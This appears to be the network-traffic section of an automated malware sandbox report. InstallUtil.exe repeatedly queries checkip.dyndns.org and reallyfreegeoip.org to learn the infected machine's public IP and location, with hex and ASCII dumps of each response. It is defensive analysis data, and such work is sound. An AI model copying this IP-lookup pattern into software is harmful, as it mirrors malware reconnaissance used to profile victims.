                                                X-Request-ID: 4e9b4c3ce75193546e8c3cfc54b29dc3
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                22192.168.2.549830158.101.44.242803772C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 8, 2024 12:45:30.985053062 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:31.593583107 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:31 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 45715a58e6cd721091ef022f315e98fb
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                23192.168.2.549842158.101.44.242803772C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 8, 2024 12:45:32.227133989 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Oct 8, 2024 12:45:32.798190117 CEST320INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:32 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 194c279511c543fd622bf845f9bcfd88
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.549705188.114.97.34433228C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-08 10:44:59 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:44:59 UTC678INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:44:59 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50631
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zrD%2B6UdZ8v1Zrk0pVqHEdQqbDg2K4mn4SFyVh2upVpFx9Bqz1ruJREmWGE4%2FDoVzXNLyGRxlsLa88z0kG1iUVa4sSBc02UIwChYgHNEBA1O6fzPv%2Fzb460ri6NUR4%2FiNb0q3uENw"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf589effb27196c-EWR
                                                2024-10-08 10:44:59 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:44:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.549706188.114.97.34433228C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-08 10:45:00 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                2024-10-08 10:45:00 UTC706INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:00 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50632
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Om16Gk33QsrnPFBtgc9Gbp8hdRJHu3TbBSvVz6qBxCZqxriYyiRUxDgrt0qXB4huSgE19GEQhM%2FMsGrR7%2FcV%2F2QK7i2B7LyaxiBdrpaP4zeUYDOOjYdwycDK085sfewxOYLLwfZQ"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf589f4ee7a32fa-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-10-08 10:45:00 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.549708188.114.97.34433228C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-08 10:45:06 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:06 UTC672INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:06 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50638
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iPZOySnVPIfAT890nj9LcXmjoi7XKytdD1UO5zI6AyywY1TpQmez0AKrwqRyPI0ZqHzzf4ZJ0EyCo6QaN9ZBC2WTqe3huORXFtkhRnciT0kY3Ih5NW1aW%2FM4k1QLIVnls0Z0f0Fy"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a19daa18c45-EWR
                                                2024-10-08 10:45:06 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.549711188.114.97.34433228C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-08 10:45:11 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:11 UTC708INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:11 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50643
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nCegOXyuf2lanuDbnFaoaLDtLHy9cn%2BYFZsVpfMHCH7sKeFHdav19GBMPkpiOLJrC%2Fj3vuWc1TYjOxmJht6RdpBs%2BhQydTrWTyR%2BGlGRwEjwZuWeCKyQQK4eeKHCU7LWPxbihjgV"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a3abc474367-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-10-08 10:45:11 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.549719188.114.97.34435480C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-08 10:45:15 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:15 UTC684INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:15 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50647
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V24cmL%2BxkgGN4C%2Fj7WPXBfYEyTAFEMizW%2F7RHeaRLchiGn%2BFL7m3eyLlTeF6vs7qbnwyQv4xN4EXGI%2FSSutrHVgVXaPW4lNUbfI1X2hwxawI07S%2Bmqc7VAQ3%2FFD7fVnmoeHY2hVH"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a515f153350-EWR
                                                2024-10-08 10:45:15 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.549721188.114.97.34433228C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-08 10:45:15 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:15 UTC676INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:15 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50647
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wM1UjJ4xoUtLDYSS16kHtv8qJ8WRemaXn79FsoSGo8RkdG63Etohr7nvtWxt7rPhwoV2jC44ojJlMarxtEZWciE%2F5cZnB3jElIoaGIjJhrKu%2BDF3CJulhIIkjQjk%2B0f0Bd4WX5jx"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a550ff541c6-EWR
                                                2024-10-08 10:45:15 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.549722188.114.97.34435480C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-08 10:45:15 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                2024-10-08 10:45:15 UTC676INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:15 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50647
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H2YaMzhqbR%2B1YYlmLag1D9CDcQ3CyeJviWCLBUFELKVy7VTM3nYE9IIvz09THm4rzXS6ZFCCuScYzi1RdW%2BxFRkj1%2FBWkLrQXLdtiNCntwRyjZSwoeoGm5Elzl1D4fJy5rxJNwRT"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a563c7d72ad-EWR
                                                2024-10-08 10:45:15 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.549735188.114.97.34433228C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-08 10:45:16 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:16 UTC676INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:16 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50648
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IC3pqRijpk8oZWhBgFai8zhz%2FOvzy5Batt1nZ0B5LfggjTIB0NE%2Bmm2HN7ZkCmaSaygVkODR%2FIzR6VnSKEqcJ3Q4DgTi1EH3le5458rBwEYHtVJ3rsz22SF8JhxP3Ob2iFlrrKPk"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a5caa8d42c2-EWR
                                                2024-10-08 10:45:16 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                2024-10-08 10:45:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.549736188.114.97.34435480C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-08 10:45:16 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                Host: reallyfreegeoip.org
                                                Connection: Keep-Alive
                                                2024-10-08 10:45:17 UTC678INHTTP/1.1 200 OK
                                                Date: Tue, 08 Oct 2024 10:45:17 GMT
                                                Content-Type: application/xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                access-control-allow-origin: *
                                                vary: Accept-Encoding
                                                Cache-Control: max-age=86400
                                                CF-Cache-Status: HIT
                                                Age: 50649
                                                Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=137Js%2FquBIpwOnPcGMhwwPpV8p1zHGFUvX0l%2F8a%2FXnxnmVm7M5Gqf2xxIrzgjojQ21YaKKI9v16CcCgSwQMpuKSOzZXrEafXtGWxfXlgUIxaLzUw097DWz%2BseBYVp8z2wCEtvsGN"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8cf58a5dbad21831-EWR
